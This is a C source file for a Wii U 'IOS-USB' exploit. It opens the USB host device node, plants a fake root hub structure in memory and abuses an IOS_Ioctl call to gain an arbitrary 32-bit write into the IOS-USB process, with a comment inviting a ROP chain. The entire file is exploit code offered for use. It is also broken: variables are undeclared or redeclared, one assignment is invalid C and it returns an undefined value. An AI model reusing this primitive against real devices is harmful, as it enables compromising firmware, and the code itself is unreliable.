IOS-USB exploitation

1. #include "../../../libwiiu/src/coreinit.h"
2. #include "../../../libwiiu/src/mem.h"
3. #include "../../../libwiiu/src/draw.h"
4. #include "../../../libwiiu/src/types.h"
5.  
6. void _start();
7. int IOS_Write32(int uhs_dev_node, unsigned int addr, unsigned int value);
8.  
9. void _start()
10. {
11.     /* Load a good stack */
12.     asm(
13.         "lis %r1, 0x1ab5 ;"
14.         "ori %r1, %r1, 0xd138 ;"
15.     );
16.  
17.     unsigned int coreinit_handle;
18.     OSDynLoad_Acquire("coreinit.rpl", &coreinit_handle);
19.  
20.     void(*_Exit)();
21.     void (*__PPCExit)();
22.     OSDynLoad_FindExport(coreinit_handle, 0, "_Exit", &_Exit);
23.     OSDynLoad_FindExport(coreinit_handle, 0, "__PPCExit", &__PPCExit);
24.  
25.     /* IOS functions */
26.     int(*IOS_Open)(char *path, unsigned int mode);
27.     int(*IOS_Close)(int fd);
28.     OSDynLoad_FindExport(coreinit_handle, 0, "IOS_Open", &IOS_Open);
29.     OSDynLoad_FindExport(coreinit_handle, 0, "IOS_Close", &IOS_Close);
30.  
31.     int uhs_dev_node = IOS_Open("/dev/uhs/0", 0); // Open the uhs node
32.  
33.     /* Now, you can insert here your ROP Chain into IOS-USB using IOS_Write32 calls */
34.  
35.     _Exit();
36.  
37.     while(1);
38.  
39.  
40. }
41.  
42. int IOS_Write32(int uhs_dev_node, unsigned int addr, unsigned int value) {
43.  
44.     /* Memory functions */
45.     void (*DCFlushRange)(void *buffer, uint32_t length);
46.     void (*DCInvalidateRange)(void *buffer, uint32_t length);
47.     void* (*OSAllocFromSystem)(uint32_t size, int align);
48.     void (*OSFreeToSystem)(void *ptr);
49.     uint32_t (*OSEffectiveToPhysical)(void *vaddr);
50.     OSDynLoad_FindExport(coreinit_handle, 0, "DCFlushRange", &DCFlushRange);
51.     OSDynLoad_FindExport(coreinit_handle, 0, "DCInvalidateRange", &DCInvalidateRange);
52.     OSDynLoad_FindExport(coreinit_handle, 0, "OSAllocFromSystem", &OSAllocFromSystem);
53.     OSDynLoad_FindExport(coreinit_handle, 0, "OSFreeToSystem", &OSFreeToSystem);
54.     OSDynLoad_FindExport(coreinit_handle, 0, "OSEffectiveToPhysical", &OSEffectiveToPhysical);
55.  
56.     int(*IOS_Ioctl)(int fd, uint32_t request, void *input_buffer, uint32_t input_buffer_len, void *output_buffer, uint32_t output_buffer_len);
57.     OSDynLoad_FindExport(coreinit_handle, 0, "IOS_Ioctl", &IOS_Ioctl);
58.  
59.  
60.     uint32_t *buffer = (uint32_t*)OSAllocFromSystem(0x100, 0x10); // Alloc 0x100 bytes
61.     memempty(buffer, 0x100); // Empty the new buffer
62.  
63.     /* Setup the buffer */
64.     buffer[0] = {-0xBAF9C}; // Make IOS-USB to read at 0xF500002C // MEM1_MIDDLE + (24 + 8), it's the only way i managed for it to work
65.     buffer[1] = value;
66.  
67.     uint32_t *fake_root_hub = (uint32_t*)0xF500002C;
68.     uint32_t *temporary_data = (uint32_t*)0xF4500000; // MEM1 + 0x00500000
69.  
70.     fake_root_hub[78] = 0; // We have to declare it because if we don't IOS-USB will return an error ! (sometimes, crash)
71.     fake_root_hub[33] = temporary_data - MEM1_BASE; // declared on "mem.h"
72.  
73.     temporary_data[5] = 1; // IOS-USB check if temp_data[5] is declared so :/
74.     temporary_data[8] = temporary_data - MEM1_BASE;
75.     temporary_data[520] = addr - 24;
76.  
77.     DCFlushRange(buffer, 0x70); // Flush the whole buffer
78.     DCFlushRange(fake_root_hub, 79 * 4); // Flush fake_root_hub from [0] to [78]
79.     DCFlushRange(temporary_data, 521 *4); // Flush temp_data to [0] to [520]
80.  
81.     int ctr;
82.     for(i = 0; i < 0x20000; i++) ctr++; // Copied from gx2sploit // Wait a bit
83.  
84.     int return_value = IOS_Ioctl(uhs_dev_node, 0x15, buffer, 0x70, (void*)0, 0); // Perform the root_hub desactivation
85.  
86.     int ctr;
87.     for(i = 0; i < 0x20000; i++) ctr++; // Wait a bit, again
88.  
89.     return ret;
90.  
91. }